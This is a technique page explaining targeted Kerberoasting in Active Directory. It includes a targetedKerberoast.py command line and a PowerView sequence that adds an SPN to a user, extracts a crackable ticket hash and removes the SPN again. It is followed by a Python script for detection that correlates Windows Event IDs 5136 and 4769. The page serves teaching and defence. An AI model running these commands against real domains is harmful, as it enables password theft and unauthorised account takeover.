Targeted Kerberoasting

Kerberoasting is an attack that abuses the way Service Principal Names (SPNs) are used for Kerberos authentication in Active Directory. When a client requests a Kerberos TGS service ticket for an SPN, the ticket is encrypted with the service account's NTLM password hash. An attacker can obtain this ticket and crack it offline; if the cracking succeeds, the attacker recovers the service account's password.

When an attacker controls an account that can edit the servicePrincipalName attribute of another user account in the domain, they can make that account vulnerable to Kerberoasting even if it was never intended as a service account. By adding an SPN to the user account, the attacker can request a Kerberos TGS service ticket for that SPN and obtain it encrypted with the user account's NTLM password hash. The attacker can then use offline password-cracking techniques to try to recover the user account's password from the ticket.

This is possible when the controlled account has GenericAll, GenericWrite, WriteProperty, WriteSPN or Validated-SPN rights over the target user object.

Once we've identified an account with one of these ACLs, we can use targetedKerberoast.py to perform the attack from a UNIX-like system:

python3 targetedKerberoast.py -vv -d domain.com -u otter -p 'SomethingSecure123!' --request-user anotherUser --dc-ip 10.10.10.10

or PowerShell (PowerView) from Windows:

Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
Import-Module .\PowerView.ps1

# add an SPN to the target user
Set-DomainObject -Identity otter -Set @{serviceprincipalname='weball/OTTR'} -Verbose

# request the TGS ticket for that SPN and extract the crackable hash
$User = Get-DomainUser otter
$User | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash

# clear the SPN
Set-DomainObject -Identity otter -Clear serviceprincipalname -Verbose
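From the defender's side, the sequence above leaves a distinctive trail: a servicePrincipalName write on a user object (Windows Security Event ID 5136), an RC4-encrypted TGS request for that same account shortly after (Event ID 4769 with ticket encryption type 0x17), and often the SPN being removed again. The following Python is an added detection example, not code from this page or from the targetedKerberoast or PowerView projects; the event field names and sample values are simplified and constructed for the demonstration.

```python
from datetime import datetime, timedelta

# Constructed sample events, simplified from Windows Security log fields
# (5136 = directory service object modified, 4769 = Kerberos service ticket requested).
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-01-10T10:00:00", "actor": "DOMAIN\\attacker", "object_class": "user",
     "object_dn": "CN=otter,OU=Users,DC=domain,DC=com", "attribute": "servicePrincipalName",
     "operation": "add", "value": "weball/OTTR"},
    {"id": 4769, "time": "2024-01-10T10:00:40", "client": "DOMAIN\\attacker",
     "service": "otter", "enc_type": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-01-10T10:02:00", "client": "DOMAIN\\jdoe",
     "service": "sqlsvc", "enc_type": "0x12", "status": "0x0"},  # AES ticket for a real service: benign
    {"id": 5136, "time": "2024-01-10T10:03:00", "actor": "DOMAIN\\attacker", "object_class": "user",
     "object_dn": "CN=otter,OU=Users,DC=domain,DC=com", "attribute": "servicePrincipalName",
     "operation": "delete", "value": "weball/OTTR"},
]

RC4_HMAC = "0x17"  # ticket encryption type that yields an offline-crackable hash


def account_from_dn(dn):
    """'CN=otter,OU=Users,...' -> 'otter' (value of the first RDN, lower-cased)."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def find_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Flag SPN additions to user objects that are followed, within the window,
    by an RC4 TGS request for that account or by removal of the same SPN."""
    alerts = []
    spn_adds = [e for e in events if e["id"] == 5136 and e["object_class"] == "user"
                and e["attribute"].lower() == "serviceprincipalname" and e["operation"] == "add"]
    for add in spn_adds:
        account = account_from_dn(add["object_dn"])
        t0 = datetime.fromisoformat(add["time"])
        for e in events:
            t = datetime.fromisoformat(e["time"])
            if not (t0 <= t <= t0 + window):
                continue
            if (e["id"] == 4769 and e["service"].lower() == account
                    and e["enc_type"] == RC4_HMAC and e["status"] == "0x0"):
                alerts.append(("rc4_tgs_after_spn_add", account, add["actor"], e["client"]))
            elif (e["id"] == 5136 and e["operation"] == "delete" and e["value"] == add["value"]
                    and account_from_dn(e["object_dn"]) == account):
                alerts.append(("spn_add_then_removed", account, add["actor"], e["actor"]))
    return alerts


if __name__ == "__main__":
    for alert in find_targeted_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

Event 5136 is only generated when Directory Service Changes auditing is enabled and the user objects carry a matching SACL, so confirm that before relying on the SPN-write half of the correlation.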